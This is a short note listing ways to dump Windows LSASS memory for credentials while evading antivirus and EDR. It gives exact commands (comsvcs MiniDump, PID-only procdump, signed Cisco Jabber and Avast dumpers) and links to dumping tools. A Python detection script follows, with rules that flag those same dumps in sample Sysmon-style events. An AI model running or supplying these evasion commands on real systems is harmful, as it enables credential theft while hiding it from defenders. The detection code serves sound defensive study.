A few techniques to avoid AV or EDR detection
1. rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"
2. procdump <process id> instead of the word lsass
Signed executables that can also be used:
3. CiscoJabber : CiscoJabberProcessDump.exe (ps lsass).id c:\temp\lsass.dmp
See original article: https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz
4. Avast Dumper : AvDump.exe --pid 676 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file E:\lsass.dmp --min_interval 0
See original article: https://www.archcloudlabs.com/projects/dumping-memory-with-av/
5. You can use my fork of Dumpert : https://github.com/k4nfr3/Dumpert
6. You can use PPLDump from itm4n : https://github.com/itm4n/PPLdump
7. A newer approach is LsassSilentProcessExit (it configures an automatic dump of a monitored process: add lsass, then kill lsass) : https://github.com/deepinstinct/LsassSilentProcessExit/
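From the detection side, an added example (not from the original post) that runs simple rules over constructed Sysmon-style events for items 1 to 4 and 7 above: it keys on the dumper binary and on a handle to lsass.exe with PROCESS_VM_READ rather than on the literal string "lsass", which items 2 to 4 avoid on purpose. The event shape, file paths and PID 624 are assumptions.

```python
import re

# Constructed sample events in a simplified Sysmon-like shape (not real telemetry).
# id 1 = process creation, id 10 = process access, id 13 = registry value set.
SAMPLE_EVENTS = [
    {"id": 1, "cmdline": r'rundll32 C:\windows\system32\comsvcs.dll MiniDump "624 dump.bin full"'},
    {"id": 1, "cmdline": r"procdump64.exe -ma 624 c:\temp\out.dmp"},        # PID only, no "lsass"
    {"id": 10, "source": r"C:\Tools\procdump64.exe",
     "target": r"C:\Windows\System32\lsass.exe", "access": "0x1FFFFF"},
    {"id": 1, "cmdline": r"CiscoJabberProcessDump.exe 624 c:\temp\lsass.dmp"},
    {"id": 1, "cmdline": r"AvDump.exe --pid 624 --dump_level 1 --dump_file E:\lsass.dmp"},
    {"id": 13, "target": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                         r"\SilentProcessExit\lsass.exe\DumpType"},
    {"id": 10, "source": r"C:\Windows\System32\svchost.exe",                  # benign query
     "target": r"C:\Windows\System32\lsass.exe", "access": "0x1000"},
    {"id": 1, "cmdline": "notepad.exe"},
]

# Command-line rules keyed on the dumper itself, not on the literal "lsass" string.
CMDLINE_RULES = [
    ("comsvcs MiniDump", re.compile(r"comsvcs\.dll.*minidump", re.I)),
    ("procdump", re.compile(r"procdump(64)?(\.exe)?\s", re.I)),
    ("signed dumper binary", re.compile(r"(CiscoJabberProcessDump|AvDump)\.exe", re.I)),
]
PROCESS_VM_READ = 0x10  # every dumper needs this bit in the granted access mask


def classify(event):
    """Return (rule, detail) findings for one event; an empty list means nothing matched."""
    findings = []
    if event["id"] == 1:
        for name, rx in CMDLINE_RULES:
            if rx.search(event["cmdline"]):
                findings.append((name, event["cmdline"]))
    elif event["id"] == 10 and event["target"].lower().endswith("\\lsass.exe"):
        # Catches the PID-only procdump line: the handle to lsass.exe gives it away.
        if int(event["access"], 16) & PROCESS_VM_READ:
            findings.append(("lsass handle with PROCESS_VM_READ", f'{event["source"]} {event["access"]}'))
    elif event["id"] == 13 and "\\silentprocessexit\\lsass.exe" in event["target"].lower():
        # Item 7: the IFEO SilentProcessExit key is written before lsass is killed.
        findings.append(("SilentProcessExit configured for lsass", event["target"]))
    return findings


def scan(events):
    return [f for e in events for f in classify(e)]


if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```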